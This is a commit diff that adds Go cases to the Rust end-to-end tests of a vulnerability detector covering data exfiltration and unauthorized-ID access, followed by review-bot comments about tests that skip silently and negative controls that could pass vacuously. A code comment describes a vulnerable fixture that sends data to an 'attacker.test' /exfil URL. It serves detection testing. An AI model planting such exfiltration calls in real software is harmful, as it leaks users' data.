[pitboss/grind] deferred session-0011 (20260522T163126Z-7d60)

pitboss 2026-05-22 16:11:50 -05:00
parent 089fe3556a
commit 6c4322832f
3 changed files with 606 additions and 6 deletions


@ -134,8 +134,13 @@ mod e2e_data_exfil {
use tempfile::TempDir;
fn command_available(bin: &str) -> bool {
// Go's CLI uses `go version` (subcommand) instead of `go
// --version` and exits non-zero on `--version`. Every other
// toolchain here (python3, ruby, node, javac, php) accepts
// `--version`.
let arg = if bin == "go" { "version" } else { "--version" };
Command::new(bin)
.arg("--version")
.arg(arg)
.output()
.map(|o| o.status.success())
.unwrap_or(false)
@ -150,8 +155,9 @@ mod e2e_data_exfil {
Lang::JavaScript => "js",
Lang::Java => "java",
Lang::Php => "php",
Lang::Go => "go",
_ => unreachable!(
"DATA_EXFIL e2e currently covers Python + Ruby + JavaScript + Java + Php"
"DATA_EXFIL e2e currently covers Python + Ruby + JavaScript + Java + Php + Go"
),
})
.join(fixture);
@ -197,8 +203,9 @@ mod e2e_data_exfil {
Lang::JavaScript => "node",
Lang::Java => "javac",
Lang::Php => "php",
Lang::Go => "go",
_ => unreachable!(
"DATA_EXFIL e2e currently covers Python + Ruby + JavaScript + Java + Php"
"DATA_EXFIL e2e currently covers Python + Ruby + JavaScript + Java + Php + Go"
),
};
if !command_available(required) {
@ -404,4 +411,41 @@ mod e2e_data_exfil {
"PHP DATA_EXFIL benign control must not confirm via run_spec; got {outcome:?}",
);
}
/// Go pair, same shape as Python + Ruby + JavaScript + Java + Php.
/// The vuln fixture calls `http.Get("http://" + host + "/exfil?...")`;
/// the harness replaces `http.DefaultTransport` with a custom
/// `RoundTripper` that captures `req.URL.Hostname()` before any
/// wire I/O, emits a `ProbeKind::OutboundNetwork`, and returns a
/// benign empty 200 response. `OutboundHostNotIn` fires for the
/// `attacker.test` payload. The benign fixture's
/// `if _, ok := allowlist[host]; !ok { return }` guard short-
/// circuits before `http.Get` for non-loopback payloads so no
/// probe fires. Skips when `go` is not on PATH.
#[test]
fn go_vuln_confirms_via_run_spec() {
let Some(outcome) = run(Lang::Go, "vuln.go", "Run") else {
return;
};
assert!(
outcome.triggered_by.is_some(),
"Go DATA_EXFIL vuln must confirm via run_spec; got {outcome:?}",
);
let diff = outcome
.differential
.as_ref()
.expect("confirmed run must carry a DifferentialOutcome");
assert_eq!(diff.verdict, DifferentialVerdict::Confirmed);
}
#[test]
fn go_benign_does_not_confirm_via_run_spec() {
let Some(outcome) = run(Lang::Go, "benign.go", "Run") else {
return;
};
assert!(
outcome.triggered_by.is_none(),
"Go DATA_EXFIL benign control must not confirm via run_spec; got {outcome:?}",
);
}
}
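Review bot: Both new tests `return` when `run` yields `None`, so on a machine without `go` on PATH `go_vuln_confirms_via_run_spec` and `go_benign_does_not_confirm_via_run_spec` are reported as passed without exercising the DATA_EXFIL check at all; the two Go tests added to `e2e_unauthorized_id` do the same. For a detection harness that is a silent coverage gap, because a CI image that loses the Go toolchain still produces a green run. Output from passing tests is captured by default, so a print alone would not surface it; an opt-in switch that turns the skip into a failure would, e.g. `else { assert!(std::env::var_os("<REQUIRE_TOOLCHAINS_VAR>").is_none(), "go toolchain required but not found"); return; };` with a variable name of the project's choosing. `run` and the `command_available(required)` branch are defined outside the hunks shown, so what else can produce `None` is not visible here.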


@ -125,8 +125,13 @@ mod e2e_unauthorized_id {
use tempfile::TempDir;
fn command_available(bin: &str) -> bool {
// Go's CLI uses `go version` (subcommand) instead of `go
// --version` and exits non-zero on `--version`. Every other
// toolchain here (python3, ruby, node, javac, php) accepts
// `--version`.
let arg = if bin == "go" { "version" } else { "--version" };
Command::new(bin)
.arg("--version")
.arg(arg)
.output()
.map(|o| o.status.success())
.unwrap_or(false)
@ -141,8 +146,9 @@ mod e2e_unauthorized_id {
Lang::JavaScript => "js",
Lang::Java => "java",
Lang::Php => "php",
Lang::Go => "go",
_ => unreachable!(
"UNAUTHORIZED_ID e2e currently covers Python + Ruby + JavaScript + Java + Php"
"UNAUTHORIZED_ID e2e currently covers Python + Ruby + JavaScript + Java + Php + Go"
),
})
.join(fixture);
@ -188,8 +194,9 @@ mod e2e_unauthorized_id {
Lang::JavaScript => "node",
Lang::Java => "javac",
Lang::Php => "php",
Lang::Go => "go",
_ => unreachable!(
"UNAUTHORIZED_ID e2e currently covers Python + Ruby + JavaScript + Java + Php"
"UNAUTHORIZED_ID e2e currently covers Python + Ruby + JavaScript + Java + Php + Go"
),
};
if !command_available(required) {
@ -387,4 +394,40 @@ mod e2e_unauthorized_id {
"PHP UNAUTHORIZED_ID benign control must not confirm via run_spec; got {outcome:?}",
);
}
/// Go pair, same shape as Python + Ruby + JavaScript + Java + Php.
/// The vuln fixture's `store[ownerID]` materialises `"bob@x"` for
/// the `bob` payload; the harness's `reflect`-driven presence check
/// fires the `IdorAccess(alice, bob)` probe and
/// `IdorBoundaryCrossed` confirms the differential. The benign
/// fixture's `if ownerID != callerID { return "" }` short-circuit
/// returns an empty string for the non-caller payload so the
/// presence check clears and no probe fires. Skips when `go` is
/// not on PATH.
#[test]
fn go_vuln_confirms_via_run_spec() {
let Some(outcome) = run(Lang::Go, "vuln.go", "Run") else {
return;
};
assert!(
outcome.triggered_by.is_some(),
"Go UNAUTHORIZED_ID vuln must confirm via run_spec; got {outcome:?}",
);
let diff = outcome
.differential
.as_ref()
.expect("confirmed run must carry a DifferentialOutcome");
assert_eq!(diff.verdict, DifferentialVerdict::Confirmed);
}
#[test]
fn go_benign_does_not_confirm_via_run_spec() {
let Some(outcome) = run(Lang::Go, "benign.go", "Run") else {
return;
};
assert!(
outcome.triggered_by.is_none(),
"Go UNAUTHORIZED_ID benign control must not confirm via run_spec; got {outcome:?}",
);
}
}
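Review bot: `go_benign_does_not_confirm_via_run_spec` asserts only `outcome.triggered_by.is_none()`, which would also hold if the benign fixture never executed; the benign test added to `e2e_data_exfil` has the same shape. Whether `run` surfaces a build or runtime failure of `benign.go` as an error or as an outcome without a trigger cannot be seen from this hunk. If it is the latter, the negative control passes vacuously and says nothing about the `ownerID != callerID` guard. I would add an assertion on whatever part of the outcome records that the harness ran to completion, and until then document the limit on the test: `// Negative control: only meaningful if benign.go built and ran; a failed run also leaves triggered_by empty.`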